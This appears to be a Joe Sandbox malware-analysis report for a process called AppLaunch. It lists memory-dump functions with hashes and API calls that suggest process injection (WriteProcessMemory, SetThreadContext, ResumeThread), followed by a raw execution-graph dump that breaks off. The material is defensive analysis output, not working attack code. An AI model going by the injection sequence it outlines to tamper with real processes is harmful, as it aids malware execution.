• Opcode ID: ee95f35d534a93094f4aff63c5d3a1b2b2f2461f4e89eed3dd28984cc93c9a0a
• Instruction ID: 5904aa12ce17f1f8c699901867009d199f9393f1000cc7074fc6071a89a62cb9
• Opcode Fuzzy Hash: ee95f35d534a93094f4aff63c5d3a1b2b2f2461f4e89eed3dd28984cc93c9a0a
• Instruction Fuzzy Hash: 9B51C0B1D00209EFDB14CFA9D884ADEFFB5BF48354F64812AE819AB210D7759985CF90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph: function at 9c3ccb8, calls CreateWindowExW]
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 09C3CDCA
Memory Dump Source
• Source File: 00000005.00000002.933882138.0000000009C30000.00000040.00000001.sdmp, Offset: 09C30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_9c30000_AppLaunch.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 21885113b4e604e3c57af573a9e1f2e7cec7236346143f687938508470ee2692
• Instruction ID: eaa81f243f1b0d8295243377f1777704325e813aa864c8ad32b89bf63faac954
• Opcode Fuzzy Hash: 21885113b4e604e3c57af573a9e1f2e7cec7236346143f687938508470ee2692
• Instruction Fuzzy Hash: 6551B0B1D00309DFDB14CFAAD884ADEBBB5BF48314F64852AE819AB210D775A945CF90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph: function at 9c31b54, calls LoadLibraryA]
APIs
• LoadLibraryA.KERNELBASE(?), ref: 09C31C47
Memory Dump Source
• Source File: 00000005.00000002.933882138.0000000009C30000.00000040.00000001.sdmp, Offset: 09C30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_9c30000_AppLaunch.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: cab681ab59413c1499d938b38f84a1444cf1e906d7bbaeb3b9c7b4944723898c
• Instruction ID: fc0a10120a0ea1747583ebcb16bb9864862ae52576ac306e996277b7120c4e0c
• Opcode Fuzzy Hash: cab681ab59413c1499d938b38f84a1444cf1e906d7bbaeb3b9c7b4944723898c
• Instruction Fuzzy Hash: 714135B0D042189FDB10CFA9E9857DEBBF5FB48308F18852AE815AB380D7759846CF91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph: function at 9c3e404, calls CallWindowProcW]
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 09C3F849
Memory Dump Source
• Source File: 00000005.00000002.933882138.0000000009C30000.00000040.00000001.sdmp, Offset: 09C30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_9c30000_AppLaunch.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: 2346e7bc4dd7214ef16b661f972231b3b6209ad102ce60c986aff5f889fec6ff
• Instruction ID: 42a3c5eeb23d7a0ec920cdad8a47b0b203c59d252cc6e40838d27ca93e9a4d99
• Opcode Fuzzy Hash: 2346e7bc4dd7214ef16b661f972231b3b6209ad102ce60c986aff5f889fec6ff
• Instruction Fuzzy Hash: 754137B4D00205DFDB14CF99D488AAABBF9FB89314F24C959E519AB321D334A941CFA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph: function at 9c31b60, calls LoadLibraryA]
APIs
• LoadLibraryA.KERNELBASE(?), ref: 09C31C47
Memory Dump Source
• Source File: 00000005.00000002.933882138.0000000009C30000.00000040.00000001.sdmp, Offset: 09C30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_9c30000_AppLaunch.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 479421e33491d3261a9167a031c8d6efa53fae886cc148e3e85d0703eda04737
• Instruction ID: 420b874d6800f7195571f60d4bd2389c24aa3cfdf6207ad82694e69a839c5fa9
• Opcode Fuzzy Hash: 479421e33491d3261a9167a031c8d6efa53fae886cc148e3e85d0703eda04737
• Instruction Fuzzy Hash: 994136B0D042589FDB10CFA9E8857DEBBF5FB48314F188529E815AB380D7759846CF91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1850 5436622-5436ab9 1853 5436ac5-5436afb EnumResourceNamesW 1850->1853 1854 5436abb-5436ac3 1850->1854 1855 5436b04-5436b31 1853->1855 1856 5436afd-5436b03 1853->1856 1854->1853 1856->1855
                                                                                                                                                                        APIs
                                                                                                                                                                        • EnumResourceNamesW.KERNELBASE(?,?,00000000,?,?,?,?,?,05436A56,00000000,00000000), ref: 05436AE8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.932126221.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5430000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnumNamesResource
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3334572018-0
                                                                                                                                                                        • Opcode ID: 8fe0431e5b9930e9200b6977a92f97e4e2a99c618d08c9b866ed499a9de4e89e
                                                                                                                                                                        • Instruction ID: 513d62042ecd0c617ba661850d0485ee071ca412ef4ce81d617e7b0539f4539f
                                                                                                                                                                        • Opcode Fuzzy Hash: 8fe0431e5b9930e9200b6977a92f97e4e2a99c618d08c9b866ed499a9de4e89e
                                                                                                                                                                        • Instruction Fuzzy Hash: 5C217F71900209DFCB10CF99D845BEEBBF9FB48324F148429D559A7350D738A945CFA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09E3208C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.934046378.0000000009E30000.00000040.00000010.sdmp, Offset: 09E30000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_9e30000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                        • Opcode ID: 1afa5a995c6c5ee61ed8b6695394e27fcb666613e13cfd712099858fc4b3de7a
                                                                                                                                                                        • Instruction ID: 44096b0a94d8c454b589d17f935db20cd42458a8ffd93ee296e08d1e9962339b
                                                                                                                                                                        • Opcode Fuzzy Hash: 1afa5a995c6c5ee61ed8b6695394e27fcb666613e13cfd712099858fc4b3de7a
                                                                                                                                                                        • Instruction Fuzzy Hash: 832116B5900209EFCB10CF99D984BDEBBF8FB48314F50842AE958A7340D378A944CFA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 09C3E927
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.933882138.0000000009C30000.00000040.00000001.sdmp, Offset: 09C30000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_9c30000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                        • Opcode ID: 2272f0f3f4b005863920501c79edd23527d91123342446ed2b50167930f6a6c2
                                                                                                                                                                        • Instruction ID: 6657409d47adf7a4ca89d85d6e2de4598450f4484d783349fd04d8480fd56f79
                                                                                                                                                                        • Opcode Fuzzy Hash: 2272f0f3f4b005863920501c79edd23527d91123342446ed2b50167930f6a6c2
                                                                                                                                                                        • Instruction Fuzzy Hash: E621E4B5D002099FCB10CFA9D484ADEFBF8FB48324F14852AE954A7310D374A955CFA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • EnumResourceNamesW.KERNELBASE(?,?,00000000,?,?,?,?,?,05436A56,00000000,00000000), ref: 05436AE8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.932126221.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5430000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnumNamesResource
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3334572018-0
                                                                                                                                                                        • Opcode ID: a157b210928c0fd8272b19a41e70ccd924088d67e50de79b11e6d1105909e4fb
                                                                                                                                                                        • Instruction ID: faf2a4e3a2325bcfbe17584788464a539079b54148cad82ba58f4799b8431f02
                                                                                                                                                                        • Opcode Fuzzy Hash: a157b210928c0fd8272b19a41e70ccd924088d67e50de79b11e6d1105909e4fb
                                                                                                                                                                        • Instruction Fuzzy Hash: C4213D71900209DFCB14DF99D845BEEBBF9FB88324F248429E519A7350D778A945CFA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • EnumResourceNamesW.KERNELBASE(?,?,00000000,?,?,?,?,?,05436A56,00000000,00000000), ref: 05436AE8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.932126221.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5430000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnumNamesResource
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3334572018-0
                                                                                                                                                                        • Opcode ID: 069d3967b4eb970b45e052d97ce97135c27ab367c89605bd23663fcbb56fb697
                                                                                                                                                                        • Instruction ID: 3ad945573cfeaeb44d784715376520489aca2f9f390a6db93a8ac9913753fca4
                                                                                                                                                                        • Opcode Fuzzy Hash: 069d3967b4eb970b45e052d97ce97135c27ab367c89605bd23663fcbb56fb697
                                                                                                                                                                        • Instruction Fuzzy Hash: 45213A719002099FDB14CF99D845BEFBBF5FB88324F248429E459A7350D738A955CFA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • EnumResourceTypesW.KERNEL32(?,00000000,?), ref: 05436918
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.932126221.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5430000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnumResourceTypes
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 29811550-0
                                                                                                                                                                        • Opcode ID: a4fe1b2015ec80c217332de2ff9e40d2df5a4927a1c5c089bfe9aa7389dfafbe
                                                                                                                                                                        • Instruction ID: e639ba545e6ed9d9f3cd9ccaf5083e1e4e12d30af65cdec226726e3ca6eb6333
                                                                                                                                                                        • Opcode Fuzzy Hash: a4fe1b2015ec80c217332de2ff9e40d2df5a4927a1c5c089bfe9aa7389dfafbe
                                                                                                                                                                        • Instruction Fuzzy Hash: 2E2136719002098FCB14CF99D944BEEBBF5BF88314F14842AD419A7250D738A945CFA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 09C3E927
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.933882138.0000000009C30000.00000040.00000001.sdmp, Offset: 09C30000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_9c30000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                        • Opcode ID: ebb49c8664c4fade9c8c6c63127470b31ac476d3eda89b126d7a7e224db4adce
                                                                                                                                                                        • Instruction ID: 32c7664e3476037140016ddd48792b5bc1a6f6c1efcbdf9290a4c129b91ba768
                                                                                                                                                                        • Opcode Fuzzy Hash: ebb49c8664c4fade9c8c6c63127470b31ac476d3eda89b126d7a7e224db4adce
                                                                                                                                                                        • Instruction Fuzzy Hash: CC21A5B5D00209DFDB10CF99D584ADEBBF8FB48324F54841AE914A7350D374A955CFA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09E3208C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.934046378.0000000009E30000.00000040.00000010.sdmp, Offset: 09E30000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_9e30000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                        • Opcode ID: cd66369ec463c4088304929c7c580fb3b51c4e91d85c53ca794f03dd5a562d20
                                                                                                                                                                        • Instruction ID: 3abeab484ef0bb3fbf65423662b736201c1bd78651eedca0ec5a669d9fa945f9
                                                                                                                                                                        • Opcode Fuzzy Hash: cd66369ec463c4088304929c7c580fb3b51c4e91d85c53ca794f03dd5a562d20
                                                                                                                                                                        • Instruction Fuzzy Hash: 4821D5B1900209DFDB10CF99D984BDEBBF8FB48314F54842AE958A7340D379A945CFA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• EnumResourceTypesW.KERNEL32(?,00000000,?), ref: 05436918
Memory Dump Source
• Source File: 00000005.00000002.932126221.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_5430000_AppLaunch.jbxd
Similarity
• API ID: EnumResourceTypes
• String ID:
• API String ID: 29811550-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09E31FB9
Memory Dump Source
• Source File: 00000005.00000002.934046378.0000000009E30000.00000040.00000010.sdmp, Offset: 09E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_9e30000_AppLaunch.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09E31FB9
Memory Dump Source
• Source File: 00000005.00000002.934046378.0000000009E30000.00000040.00000010.sdmp, Offset: 09E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_9e30000_AppLaunch.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetThreadContext.KERNELBASE(?,00000000), ref: 09E31EF3
Memory Dump Source
• Source File: 00000005.00000002.934046378.0000000009E30000.00000040.00000010.sdmp, Offset: 09E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_9e30000_AppLaunch.jbxd
Similarity
• API ID: ContextThread
• String ID:
• API String ID: 1591575202-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.934046378.0000000009E30000.00000040.00000010.sdmp, Offset: 09E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_9e30000_AppLaunch.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.934046378.0000000009E30000.00000040.00000010.sdmp, Offset: 09E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_9e30000_AppLaunch.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.931932943.00000000053CD000.00000040.00000001.sdmp, Offset: 053CD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_53cd000_AppLaunch.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.931932943.00000000053CD000.00000040.00000001.sdmp, Offset: 053CD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_53cd000_AppLaunch.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.931967164.00000000053DD000.00000040.00000001.sdmp, Offset: 053DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_53dd000_AppLaunch.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.931967164.00000000053DD000.00000040.00000001.sdmp, Offset: 053DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_53dd000_AppLaunch.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.931967164.00000000053DD000.00000040.00000001.sdmp, Offset: 053DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_53dd000_AppLaunch.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                        • Opcode ID: 2a5cf24ec54588805e66208b0f13fa3b48565b256aa18bd2a647d477d7503959
                                                                                                                                                                        • Instruction ID: 6fd85c46d54c72f0b94b11e2174ee2fb9f0424edd49958316e5e16531429c4b8
                                                                                                                                                                        • Opcode Fuzzy Hash: 2a5cf24ec54588805e66208b0f13fa3b48565b256aa18bd2a647d477d7503959
                                                                                                                                                                        • Instruction Fuzzy Hash: 9421F272504244DFDB10DF10E9C4B6AFB7AFBC4224F64C969D80A0B645C376E447C671
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.931967164.00000000053DD000.00000040.00000001.sdmp, Offset: 053DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_53dd000_AppLaunch.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a1c04f2627706eb6d834433d82f284a8ee287abb1bf594dd706e169db420c89e
• Instruction ID: 84ab7d58556410546166d1ef4919cd4178f91dc747d5449d3b4efb50680de424
• Opcode Fuzzy Hash: a1c04f2627706eb6d834433d82f284a8ee287abb1bf594dd706e169db420c89e
• Instruction Fuzzy Hash: 8021A2765093C08FC712CF20D994B16FF71FB86224F29C5AAD8458B696C37AD44ACB62
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.931932943.00000000053CD000.00000040.00000001.sdmp, Offset: 053CD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_53cd000_AppLaunch.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0b542bd3278c9900dffdafc875f4b96c8e5add24c359be4243397ba3ac3bd772
• Instruction ID: 47d7a69629f507c36e2489b8167148b8426a35da34302340108bb91ea680bacb
• Opcode Fuzzy Hash: 0b542bd3278c9900dffdafc875f4b96c8e5add24c359be4243397ba3ac3bd772
• Instruction Fuzzy Hash: 6F11A276404680DFCB11CF10D5C4B16BF62FB84320F24C5EDE9054B656C37AD866CB91
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.931932943.00000000053CD000.00000040.00000001.sdmp, Offset: 053CD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_53cd000_AppLaunch.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0b542bd3278c9900dffdafc875f4b96c8e5add24c359be4243397ba3ac3bd772
• Instruction ID: 5a6032994349b9b3491cb512cda8ca23720138923bc64aaddeaca00964ee2b67
• Opcode Fuzzy Hash: 0b542bd3278c9900dffdafc875f4b96c8e5add24c359be4243397ba3ac3bd772
• Instruction Fuzzy Hash: 45119676504280DFCB15CF10D5C4B26BF72FB88324F24C5ADE8454B656C376D45ACB91
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.931967164.00000000053DD000.00000040.00000001.sdmp, Offset: 053DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_53dd000_AppLaunch.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1cf331315f21bef1ddd9f1f7a189a899e1f7dc60603ca671fb2ef40e52cd521c
• Instruction ID: bc0d4c745c35fc88bd00c262a8eb547777ec92511d07b75e2b2ee7bba6681fd9
• Opcode Fuzzy Hash: 1cf331315f21bef1ddd9f1f7a189a899e1f7dc60603ca671fb2ef40e52cd521c
• Instruction Fuzzy Hash: 91118276504280DFDB51CF14E9C4B25FB72FB84324F24C6AAD8494B646C37AD45ACBA2
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.931967164.00000000053DD000.00000040.00000001.sdmp, Offset: 053DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_53dd000_AppLaunch.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ad2a8cfca3367af31ed8fccdba65c6857044cb1be902d9aeec9971aaaa20cc2e
• Instruction ID: f3f32751e276e459ac37451bee459a7bcc9fb44f07a31abbe02f2ba787d23bc3
• Opcode Fuzzy Hash: ad2a8cfca3367af31ed8fccdba65c6857044cb1be902d9aeec9971aaaa20cc2e
• Instruction Fuzzy Hash: 25119D76504280DFCB11CF10D5C4B25FBB2FB84324F28CAAED8494B696C37AD45ACB62
Uniqueness
Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 6.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 2.2%
Total number of Nodes: 1668
Total number of Limit Nodes: 50
execution_graph (rendered call-graph data for the AppLaunch process, spilled into the text where the graph image was; each node is a function address with its API-call summary, written as "38270 401645 16 API calls" or "36362 414266 EnumResourceNamesW", and each edge is written as "caller->callee", e.g. "36384->36403"; the visible entry chain runs from the CRT start-up at 44472e (GetModuleHandleA, __set_app_type, __p__fmode, __p__commode, __setusermatherr, _controlfp, _initterm, __wgetmainargs, GetStartupInfoW) through 40ff55 into the main window loop at 41005b (ShowWindow, UpdateWindow, LoadAcceleratorsW, GetMessageW, TranslateAcceleratorW, IsDialogMessageW, TranslateMessage, DispatchMessageW), with CoInitialize at 41004b and CoUninitialize at 41013f; the raw node and edge list is cut off at the end of this extract)
calls 36598->36631 36632 443c91 9 API calls 36600->36632 36601 443dee 36601->36597 36601->36600 36603 443e14 36633 443c91 9 API calls 36603->36633 36605 443e29 36634 443c91 9 API calls 36605->36634 36607 443e3e 36635 443c91 9 API calls 36607->36635 36609 443e53 36636 443c91 9 API calls 36609->36636 36611 443e68 36637 443c91 9 API calls 36611->36637 36613 443e7d 36638 443c91 9 API calls 36613->36638 36615 443e92 36639 443c91 9 API calls 36615->36639 36617 443ea7 ??3@YAXPAX 36617->36593 36619 444b90 36618->36619 36620 40b8cf memset GetPrivateProfileStringW 36619->36620 36621 40b929 WritePrivateProfileStringW 36620->36621 36622 40b91f 36620->36622 36623 40b925 36621->36623 36622->36621 36622->36623 36623->36579 36625 444b90 36624->36625 36626 40bc36 memset 36625->36626 36627 40bc55 LoadStringW 36626->36627 36628 40bc6f 36627->36628 36628->36627 36630 40bc87 36628->36630 36640 40b93b memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 36628->36640 36630->36423 36631->36601 36632->36603 36633->36605 36634->36607 36635->36609 36636->36611 36637->36613 36638->36615 36639->36617 36640->36628 36651 408250 GetFileAttributesW 36641->36651 36643 40bc93 36644 40bd0c 36643->36644 36645 40bc98 wcscpy wcscpy GetPrivateProfileIntW 36643->36645 36644->36425 36652 40b82a GetPrivateProfileStringW 36645->36652 36647 40bce7 36653 40b82a GetPrivateProfileStringW 36647->36653 36649 40bcf8 36654 40b82a GetPrivateProfileStringW 36649->36654 36651->36643 36652->36647 36653->36649 36654->36644 36687 40c33a 36655->36687 36659 40f3c1 36658->36659 36660 40f315 memset 36658->36660 36659->36511 36727 408282 GetModuleFileNameW 36660->36727 36662 40f33a wcsrchr 36663 40f352 wcscat 36662->36663 36664 40f34f 36662->36664 36728 41409a wcscpy wcscpy wcscpy CreateFileW CloseHandle 36663->36728 36664->36663 36666 40f398 36729 4018f4 GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 36666->36729 36668 40f3b0 36730 40c24e SendMessageW memset SendMessageW 
36668->36730 36670 40f3c0 36670->36659 36672 40e965 36671->36672 36678 40e917 36671->36678 36731 407ccf LoadCursorW SetCursor 36672->36731 36674 40e91e _wcsicmp 36674->36678 36675 40e96a 36732 444425 36675->36732 36735 4034e3 36675->36735 36753 408d9f free free 36675->36753 36676 40e97e 36677 4092bc _wcsicmp 36676->36677 36681 40e98e 36677->36681 36678->36672 36678->36674 36754 40e482 10 API calls 36678->36754 36679 40e9d6 36681->36679 36682 40e9cd qsort 36681->36682 36682->36679 36686->36507 36688 40c34b 36687->36688 36700 40c11b 36688->36700 36691 40c3a7 memcpy memcpy 36692 40c3f2 36691->36692 36692->36691 36693 40b301 16 API calls 36692->36693 36694 40c42d ??2@YAPAXI ??2@YAPAXI 36692->36694 36693->36692 36695 40c469 ??2@YAPAXI 36694->36695 36697 40c4a0 36694->36697 36695->36697 36697->36697 36710 40c2ba 36697->36710 36699 40336f 36699->36507 36701 40c126 ??3@YAXPAX 36700->36701 36702 40c12d 36700->36702 36701->36702 36703 40c134 ??3@YAXPAX 36702->36703 36704 40c13b 36702->36704 36703->36704 36705 40c145 ??3@YAXPAX 36704->36705 36706 40c14c 36704->36706 36705->36706 36707 40c16c ??2@YAPAXI ??2@YAPAXI 36706->36707 36708 40c165 ??3@YAXPAX 36706->36708 36709 40c15c ??3@YAXPAX 36706->36709 36707->36691 36708->36707 36709->36708 36711 408f1e free 36710->36711 36712 40c2c3 36711->36712 36713 408f1e free 36712->36713 36714 40c2cb 36713->36714 36715 408f1e free 36714->36715 36716 40c2d3 36715->36716 36717 408f1e free 36716->36717 36718 40c2db 36717->36718 36719 408ee8 4 API calls 36718->36719 36720 40c2ee 36719->36720 36721 408ee8 4 API calls 36720->36721 36722 40c2f8 36721->36722 36723 408ee8 4 API calls 36722->36723 36724 40c302 36723->36724 36725 408ee8 4 API calls 36724->36725 36726 40c30c 36725->36726 36726->36699 36727->36662 36728->36666 36729->36668 36730->36670 36731->36675 36733 444454 36732->36733 36734 444435 FreeLibrary 36732->36734 36733->36676 36734->36733 36736 4034f0 36735->36736 36737 40b1bf free 36736->36737 36738 403531 36737->36738 36755 411e4c 
36738->36755 36742 40366c 36914 403833 15 API calls 36742->36914 36744 403674 36745 40b1bf free 36744->36745 36746 40367c 36745->36746 36746->36676 36747 4035af memset memcpy 36748 4035ea wcscmp 36747->36748 36749 403557 36747->36749 36748->36749 36749->36742 36749->36747 36749->36748 36912 402d82 11 API calls 36749->36912 36913 40cd44 6 API calls 36749->36913 36751 40361b _wcsicmp 36751->36749 36753->36676 36754->36678 36756 411e5c 36755->36756 36757 411e97 36756->36757 36915 40a94c 36756->36915 36758 411ea6 memset 36757->36758 36765 412141 36757->36765 36993 4109c4 36758->36993 36762 412230 memset memset 36768 414558 10 API calls 36762->36768 36763 4122dd 36769 412399 36763->36769 36770 4122ec memset memset 36763->36770 36850 41221f 36765->36850 37053 410d36 memset memset memset memset memset 36765->37053 36772 412272 wcslen wcslen 36768->36772 36774 4123a8 memset memset memset 36769->36774 36836 412442 36769->36836 36775 414558 10 API calls 36770->36775 36778 412294 36772->36778 36779 4122aa 36772->36779 36782 41244c 36774->36782 36783 41240e 36774->36783 36776 41232e wcslen wcslen 36775->36776 36786 412350 36776->36786 36787 412366 36776->36787 36777 411e8c 36977 4444b7 36777->36977 37152 4083d6 wcslen wcscat wcscpy wcscat 36778->37152 37153 408250 GetFileAttributesW 36779->37153 36781 41255d memset 37123 401c43 memset 36781->37123 37098 414558 36782->37098 36783->36782 36794 412419 36783->36794 36784 411ee6 36785 411f92 36784->36785 36795 411f29 36784->36795 37006 410f47 memset memset memset memset memset 36785->37006 37197 4083d6 wcslen wcscat wcscpy wcscat 36786->37197 37198 408250 GetFileAttributesW 36787->37198 36789 403550 36911 411bb2 8 API calls 36789->36911 37199 40807e wcslen 36794->37199 37131 407991 